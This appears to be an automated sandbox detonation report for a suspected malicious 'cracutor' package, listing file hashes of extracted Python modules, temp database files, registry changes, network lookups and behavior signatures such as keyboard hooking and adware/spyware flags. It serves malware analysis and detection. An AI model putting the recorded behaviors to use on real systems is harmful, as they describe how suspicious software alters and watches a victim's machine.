SHA512 6bf3ef9f08f4fc07461b6ea8d9822568ad0a0f211e471b990f62c6713adb7b6be28b90f206a4ec0673b92bae99597d1c7785381e486f6091265c7df85ff0f9b5

C:\Users\Admin\AppData\Local\Temp\_MEI37922\VCRUNTIME140.dll

MD5 11d9ac94e8cb17bd23dea89f8e757f18
SHA1 d4fb80a512486821ad320c4fd67abcae63005158
SHA256 e1d6f78a72836ea120bd27a33ae89cbdc3f3ca7d9d0231aaa3aac91996d2fa4e
SHA512 aa6afd6bea27f554e3646152d8c4f96f7bcaaa4933f8b7c04346e410f93f23cfa6d29362fd5d51ccbb8b6223e094cd89e351f072ad0517553703f5bf9de28778

C:\Users\Admin\AppData\Local\Temp\_MEI37922\base_library.zip

MD5 e390f6f8210ec8f625e41d032892a555
SHA1 1942cd3974970e436f51d08284d216af91bd563f
SHA256 072a34a29da732afb01237adcc33198842edd473d014cf6b7f0ee3285f8b42d4
SHA512 b577eee901ce55fcc63403caa782a6f36dc20c18894508f78cac7d0d03c5ce0771bd4671525d7f0b5a86bf0afe0b09afea38d4e07767a8154ccc8cc27b3a295b

C:\Users\Admin\AppData\Local\Temp\_MEI37922\python3.DLL

MD5 a5471f05fd616b0f8e582211ea470a15
SHA1 cb5f8bf048dc4fc58f80bdfd2e04570dbef4730e
SHA256 8d5e09791b8b251676e16bdd66a7118d88b10b66ad80a87d5897fadbefb91790
SHA512 e87d06778201615b129dcf4e8b4059399128276eb87102b5c3a64b6e92714f6b0d5bde5df4413cc1b66d33a77d7a3912eaa1035f73565dbfd62280d09d46abff

C:\Users\Admin\AppData\Local\Temp\_MEI37922\_bz2.pyd

MD5 b45e82a398713163216984f2feba88f6
SHA1 eaaf4b91db6f67d7c57c2711f4e968ce0fe5d839
SHA256 4c2649dc69a8874b91646723aacb84c565efeaa4277c46392055bca9a10497a8
SHA512 b9c4f22dc4b52815c407ab94d18a7f2e1e4f2250aecdb2e75119150e69b006ed69f3000622ec63eabcf0886b7f56ffdb154e0bf57d8f7f45c3b1dd5c18b84ec8

C:\Users\Admin\AppData\Local\Temp\_MEI37922\_uuid.pyd

MD5 aeead50876ddb63cb8e882989041d7da
SHA1 c9bf23227ced84d39bd33665444de3e9064315c6
SHA256 c74aaeec487457139b47c0ab56e01922bfae6debef562800e5b9b6baf1ec9d6a
SHA512 74c8fe6cfd67e1984a2df9bd998ae363519de16b5840cabba01660154fbeac92e2c773ecc2884d531362e8a0b739673c44f450c1bea05ca33eef58a8e61bc2ca

C:\Users\Admin\AppData\Local\Temp\_MEI37922\select.pyd

MD5 78d421a4e6b06b5561c45b9a5c6f86b1
SHA1 c70747d3f2d26a92a0fe0b353f1d1d01693929ac
SHA256 f1694ce82da997faa89a9d22d469bfc94abb0f2063a69ec9b953bc085c2cb823
SHA512 83e02963c9726a40cd4608b69b4cdf697e41c9eedfb2d48f3c02c91500e212e7e0ab03e6b3f70f42e16e734e572593f27b016b901c8aa75f674b6e0fbb735012

memory/1884-275-0x00000171D1DA0000-0x00000171D1DAC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI37922\_socket.pyd

MD5 5dd51579fa9b6a06336854889562bec0
SHA1 99c0ed0a15ed450279b01d95b75c162628c9be1d
SHA256 3669e56e99ae3a944fbe7845f0be05aea96a603717e883d56a27dc356f8c2f2c
SHA512 7aa6c6587890ae8c3f9a5e97ebde689243ac5b9abb9b1e887f29c53eef99a53e4b4ec100c03e1c043e2f0d330e7af444c3ca886c9a5e338c2ea42aaacae09f3e

memory/1884-272-0x00000171D25A0000-0x00000171D28F0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI37922\_ssl.pyd

MD5 11c5008e0ba2caa8adf7452f0aaafd1e
SHA1 764b33b749e3da9e716b8a853b63b2f7711fcc7c
SHA256 bf63f44951f14c9d0c890415d013276498d6d59e53811bbe2fa16825710bea14
SHA512 fceb022d8694bce6504d6b64de4596e2b8252fc2427ee66300e37bcff297579cc7d32a8cb8f847408eaa716cb053e20d53e93fbd945e3f60d58214e6a969c9dd

C:\Users\Admin\AppData\Local\Temp\_MEI37922\_sqlite3.pyd

MD5 6486e5c8512bddc5f5606d11fe8f21e0
SHA1 650861b2c4a1d6689ff0a49bb916f8ff278bb387
SHA256 728d21be4d47dd664caf9fa60c1369fe059bc0498edd383b27491d0dee23e439
SHA512 f2c9267a3cab31190079037e3cc5614f19c1235852454708c4978008ea9da345892191750980aebc809cc83dd1f5788b60f8cf39a6a41623210c96af916d1821

C:\Users\Admin\AppData\Local\Temp\_MEI37922\_queue.pyd

MD5 c9ee37e9f3bffd296ade10a27c7e5b50
SHA1 b7eee121b2918b6c0997d4889cff13025af4f676
SHA256 9ecec72c5fe3c83c122043cad8ceb80d239d99d03b8ea665490bbced183ce42a
SHA512 c63bb1b5d84d027439af29c4827fa801df3a2f3d5854c7c79789cad3f5f7561eb2a7406c6f599d2ac553bc31969dc3fa9eef8648bed7282fbc5dc3fb3ba4307f

C:\Users\Admin\AppData\Local\Temp\_MEI37922\_overlapped.pyd

MD5 5bfe7d9e1877fdde718bb84b67d8be68
SHA1 ebc7389ccca80d92d7b891815843e4c7d066cd51
SHA256 fe5666c1c8215cd2773744c815fb4a3b2f52f64cf0dde25d458441da22bf5568
SHA512 9fbf4c77784677957b8ade962cc0730ef6cfa865c14c712fd2a978903596a92e359a5234095b2a23d9e4daf7abb4029cd855b91cba696fde448668ccf4a1efea

C:\Users\Admin\AppData\Local\Temp\_MEI37922\_multiprocessing.pyd

MD5 fce357f864a558c03ed17755f87d0e30
SHA1 b74ecb2bee03a8ff209f52f652c011f28d5ae4d0
SHA256 000486aaac9dd21e88b3dc65fd854dd83519b1fbcc224a70530bc3ec8cbd1a5d
SHA512 564dea2bf3410011a76ca5ea376dba3ec9b2d03fd25248824f6c956fa5ea061c1a9ee6f6b65b021ea5bf9cc5e3ab9c6fcf4779446b920891a2c0979bbc57d58b

C:\Users\Admin\AppData\Local\Temp\_MEI37922\_hashlib.pyd

MD5 cfb9e0a73a6c9d6d35c2594e52e15234
SHA1 b86042c96f2ce6d8a239b7d426f298a23df8b3b9
SHA256 50daeb3985302a8d85ce8167b0bf08b9da43e7d51ceae50e8e1cdfb0edf218c6
SHA512 22a5fd139d88c0eee7241c5597d8dbbf2b78841565d0ed0df62383ab50fde04b13a203bddef03530f8609f5117869ed06894a572f7655224285823385d7492d2

C:\Users\Admin\AppData\Local\Temp\_MEI37922\_decimal.pyd

MD5 1cdd7239fc63b7c8a2e2bc0a08d9ea76
SHA1 85ef6f43ba1343b30a223c48442a8b4f5254d5b0
SHA256 384993b2b8cfcbf155e63f0ee2383a9f9483de92ab73736ff84590a0c4ca2690
SHA512 ba4e19e122f83d477cc4be5e0dea184dafba2f438a587dd4f0ef038abd40cb9cdc1986ee69c34bac3af9cf2347bea137feea3b82e02cca1a7720d735cea7acda

C:\Users\Admin\AppData\Local\Temp\_MEI37922\_cffi_backend.cp310-win_amd64.pyd

MD5 ebb660902937073ec9695ce08900b13d
SHA1 881537acead160e63fe6ba8f2316a2fbbb5cb311
SHA256 52e5a0c3ca9b0d4fc67243bd8492f5c305ff1653e8d956a2a3d9d36af0a3e4fd
SHA512 19d5000ef6e473d2f533603afe8d50891f81422c59ae03bead580412ec756723dc3379310e20cd0c39e9683ce7c5204791012e1b6b73996ea5cb59e8d371de24

C:\Users\Admin\AppData\Local\Temp\_MEI37922\_brotli.cp310-win_amd64.pyd

MD5 ee3d454883556a68920caaedefbc1f83
SHA1 45b4d62a6e7db022e52c6159eef17e9d58bec858
SHA256 791e7195d7df47a21466868f3d7386cff13f16c51fcd0350bf4028e96278dff1
SHA512 e404adf831076d27680cc38d3879af660a96afc8b8e22ffd01647248c601f3c6c4585d7d7dc6bbd187660595f6a48f504792106869d329aa1a0f3707d7f777c6

C:\Users\Admin\AppData\Local\Temp\_MEI37922\_asyncio.pyd

MD5 6c2a86342ade2fac9454b83a49d17694
SHA1 52946875ad946e4a170072f38e28e10f6037fab9
SHA256 cf0edfd508d11bffb63d1b104b6099e0f14ea0fada762f88364e7163f2185f06
SHA512 48d8eb8d20d041df37c4a6f243056607754046ed5f497260751270b42e9eea6f22fb1fb62d015e841d0263534f50bf6c812a6ade0e8bb0a0f79226bc64d05c75

C:\Users\Admin\AppData\Local\Temp\_MEI37922\VCRUNTIME140_1.dll

MD5 7667b0883de4667ec87c3b75bed84d84
SHA1 e6f6df83e813ed8252614a46a5892c4856df1f58
SHA256 04e7ccbdcad7cbaf0ed28692fb08eab832c38aad9071749037ee7a58f45e9d7d
SHA512 968cbaafe416a9e398c5bfd8c5825fa813462ae207d17072c035f916742517edc42349a72ab6795199d34ccece259d5f2f63587cfaeb0026c0667632b05c5c74

C:\Users\Admin\AppData\Local\Temp\_MEI37922\unicodedata.pyd

MD5 a40ff441b1b612b3b9f30f28fa3c680d
SHA1 42a309992bdbb68004e2b6b60b450e964276a8fc
SHA256 9b22d93f4db077a70a1d85ffc503980903f1a88e262068dd79c6190ec7a31b08
SHA512 5f9142b16ed7ffc0e5b17d6a4257d7249a21061fe5e928d3cde75265c2b87b723b2e7bd3109c30d2c8f83913134445e8672c98c187073368c244a476ac46c3ef

C:\Users\Admin\AppData\Local\Temp\_MEI37922\sqlite3.dll

MD5 7bb1d577405f1129faf3ea0225c9d083
SHA1 60472de4b1c7a12468d79994d6d0d684c91091ef
SHA256 831ba87cb1a91d4581f0abbcc4966c6f4b332536f70cf481f609c44cc3d987c2
SHA512 33b1fd3a289193bff168c967caebc0131732bd04562a770cf2edac602ab6d958f7bde7a0e57bb125a7598852bdac30f96d0db46cb4a2460a61a0d914b011ed20

C:\Users\Admin\AppData\Local\Temp\_MEI37922\pyexpat.pyd

MD5 983d8e003e772e9c078faad820d14436
SHA1 1c90ad33dc4fecbdeb21f35ca748aa0094601c07
SHA256 e2146bed9720eb94388532551444f434d3195310fa7bd117253e7df81a8e187e
SHA512 e7f0fd841c41f313c1782331c0f0aa35e1d8ba42475d502d08c3598a3aaefd400179c19613941cdfad724eca067dd1b2f4c2f1e8a1d6f70eeb29f7b2213e6500

C:\Users\Admin\AppData\Local\Temp\_MEI37922\libssl-1_1.dll

MD5 bd857f444ebbf147a8fcd1215efe79fc
SHA1 1550e0d241c27f41c63f197b1bd669591a20c15b
SHA256 b7c0e42c1a60a2a062b899c8d4ebd0c50ef956177ba21785ce07c517c143aeaf
SHA512 2b85c1521edeadf7e118610d6546fafbbad43c288a7f0f9d38d97c4423a541dfac686634cde956812916830fbb4aad8351a23d95cd490c4a5c0f628244d30f0a

C:\Users\Admin\AppData\Local\Temp\_MEI37922\libcrypto-1_1.dll

MD5 63c4f445b6998e63a1414f5765c18217
SHA1 8c1ac1b4290b122e62f706f7434517077974f40e
SHA256 664c3e52f914e351bb8a66ce2465ee0d40acab1d2a6b3167ae6acf6f1d1724d2
SHA512 aa7bdb3c5bc8aeefbad70d785f2468acbb88ef6e6cac175da765647030734453a2836f9658dc7ce33f6fff0de85cb701c825ef5c04018d79fa1953c8ef946afd

C:\Users\Admin\AppData\Local\Temp\_MEI37922\_lzma.pyd

MD5 5a77a1e70e054431236adb9e46f40582
SHA1 be4a8d1618d3ad11cfdb6a366625b37c27f4611a
SHA256 f125a885c10e1be4b12d988d6c19128890e7add75baa935fe1354721aa2dea3e
SHA512 3c14297a1400a93d1a01c7f8b4463bfd6be062ec08daaf5eb7fcbcde7f4fa40ae06e016ff0de16cb03b987c263876f2f437705adc66244d3ee58f23d6bf7f635

C:\Users\Admin\AppData\Local\Temp\_MEI37922\libffi-7.dll

MD5 eef7981412be8ea459064d3090f4b3aa
SHA1 c60da4830ce27afc234b3c3014c583f7f0a5a925
SHA256 f60dd9f2fcbd495674dfc1555effb710eb081fc7d4cae5fa58c438ab50405081
SHA512 dc9ff4202f74a13ca9949a123dff4c0223da969f49e9348feaf93da4470f7be82cfa1d392566eaaa836d77dde7193fed15a8395509f72a0e9f97c66c0a096016

C:\Users\Admin\AppData\Local\Temp\_MEI37922\_ctypes.pyd

MD5 79f339753dc8954b8eb45fe70910937e
SHA1 3ad1bf9872dc779f32795988eb85c81fe47b3dd4
SHA256 35cdd122679041ebef264de5626b7805f3f66c8ae6cc451b8bc520be647fa007
SHA512 21e567e813180ed0480c4b21be3e2e67974d8d787e663275be054cee0a3f5161fc39034704dbd25f1412feb021d6a21b300a32d1747dee072820be81b9d9b753

C:\Users\Admin\AppData\Local\Temp\_MEI37922\Crypto\Cipher\_raw_cbc.pyd

MD5 0c46d7b7cd00b3d474417de5d6229c41
SHA1 825bdb1ea8bbfe7de69487b76abb36196b5fdac0
SHA256 9d0a5c9813ad6ba129cafef815741636336eb9426ac4204de7bc0471f7b006e1
SHA512 d81b17b100a052899d1fd4f8cea1b1919f907daa52f1bad8dc8e3f5afc230a5bca465bbac2e45960e7f8072e51fdd86c00416d06cf2a1f07db5ad8a4e3930864

C:\Users\Admin\AppData\Local\Temp\_MEI37922\Crypto\Cipher\_raw_ecb.pyd

MD5 dedae3efda452bab95f69cae7aebb409
SHA1 520f3d02693d7013ea60d51a605212efed9ca46b
SHA256 6248fdf98f949d87d52232ddf61fada5ef02cd3e404bb222d7541a84a3b07b8a
SHA512 8c1cab8f34de2623a42f0750f182b6b9a7e2affa2667912b3660af620c7d9ad3bd5b46867b3c2d50c0cae2a1bc03d03e20e4020b7ba0f313b6a599726f022c6c

C:\Users\Admin\AppData\Local\Tempcrrmvbxjol.db

MD5 42c395b8db48b6ce3d34c301d1eba9d5
SHA1 b7cfa3de344814bec105391663c0df4a74310996
SHA256 5644546ecefc6786c7be5b1a89e935e640963ccd34b130f21baab9370cb9055d
SHA512 7b9214db96e9bec8745b4161a41c4c0520cdda9950f0cd3f12c7744227a25d639d07c0dd68b552cf1e032181c2e4f8297747f27bad6c7447b0f415a86bd82845

C:\Users\Admin\AppData\Local\Tempcrkmsfpixi.db

MD5 7e58c37fd1d2f60791d5f890d3635279
SHA1 5b7b963802b7f877d83fe5be180091b678b56a02
SHA256 df01ff75a8b48de6e0244b43f74b09ab7ebe99167e5da84739761e0d99fb9fc7
SHA512 a3ec0c65b2781340862eddd6a9154fb0e243a54e88121f0711c5648971374b6f7a87d8b2a6177b4f1ae0d78fb05cf0ee034d3242920301e2ee9fcd883a21b85e

C:\Users\Admin\AppData\Local\Tempcrkipkqcvt.db

MD5 73bd1e15afb04648c24593e8ba13e983
SHA1 4dd85ca46fcdf9d93f6b324f8bb0b5bb512a1b91
SHA256 aab0b201f392fef9fdff09e56a9d0ac33d0f68be95da270e6dab89bb1f971d8b
SHA512 6eb58fb41691894045569085bd64a83acd62277575ab002cf73d729bda4b6d43c36643a5fa336342e87a493326337ed43b8e5eaeae32f53210714699cb8dfac7

C:\Users\Admin\AppData\Local\Tempcrykjucoyx.db

MD5 8f5942354d3809f865f9767eddf51314
SHA1 20be11c0d42fc0cef53931ea9152b55082d1a11e
SHA256 776ecf8411b1b0167bea724409ac9d3f8479973df223ecc6e60e3302b3b2b8ea
SHA512 fde8dfae8a862cf106b0cb55e02d73e4e4c0527c744c20886681245c8160287f722612a6de9d0046ed1156b1771229c8950b9ac036b39c988d75aa20b7bac218

C:\Users\Admin\AppData\Local\Tempcrfvzqnoln.db

MD5 f70aa3fa04f0536280f872ad17973c3d
SHA1 50a7b889329a92de1b272d0ecf5fce87395d3123
SHA256 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA512 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

C:\Users\Admin\AppData\Local\Tempcrhldqrmcd.db

MD5 349e6eb110e34a08924d92f6b334801d
SHA1 bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256 c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA512 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-19 17:20

Reported

2024-05-19 17:23

Platform

win7-20240221-en

Max time kernel

118s

Max time network

119s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\ICSharpCode.AvalonEdit.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\ICSharpCode.AvalonEdit.dll",#1

Network

N/A

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-05-19 17:20

Reported

2024-05-19 17:23

Platform

win10v2004-20240426-en

Max time kernel

139s

Max time network

145s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe.config"

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe.config"

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
NL 23.62.61.72:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 72.61.62.23.in-addr.arpa udp
NL 23.62.61.72:443 www.bing.com tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp

Files

N/A

Analysis: behavioral10

Detonation Overview

Submitted

2024-05-19 17:20

Reported

2024-05-19 17:23

Platform

win10v2004-20240508-en

Max time kernel

113s

Max time network

143s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.pdb"

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.pdb"

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 98.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
NL 23.62.61.129:443 www.bing.com tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 129.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 37.56.20.217.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

N/A

Analysis: behavioral27

Detonation Overview

Submitted

2024-05-19 17:20

Reported

2024-05-19 17:23

Platform

win7-20240215-en

Max time kernel

134s

Max time network

128s

Command Line

"C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /verb open "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\lua.xml"

Signatures

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = (value omitted) C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "422301129" C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{2A37C911-1604-11EF-8ECF-42D431E39B11} = "0" C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 401da8fe10aada01 C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002f34c9305f14e34f823c71fe5af3e36e00000000020000000000106600000001000020000000aa89af1aa4a28c8f4f4fce8e27680978327a8550a90c961c43938d080dc58688000000000e8000000002000020000000d08bf83bd7df01c1dc3d99036ff1bcc04a83612c571ecac727e855f516f02bf420000000d4029c639d9864710ef71a4a3fbc759c7d7ba704ba749052bb0e817545f9e0ee40000000a95a19927faa4c88f4293d818edd12fdc6fd23e4c307cf2c3dfd2bf720e22f4ded611b5a31180633098a18dabb34763ee9c3722521338c66a0982a3ac0dfeee7 C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A

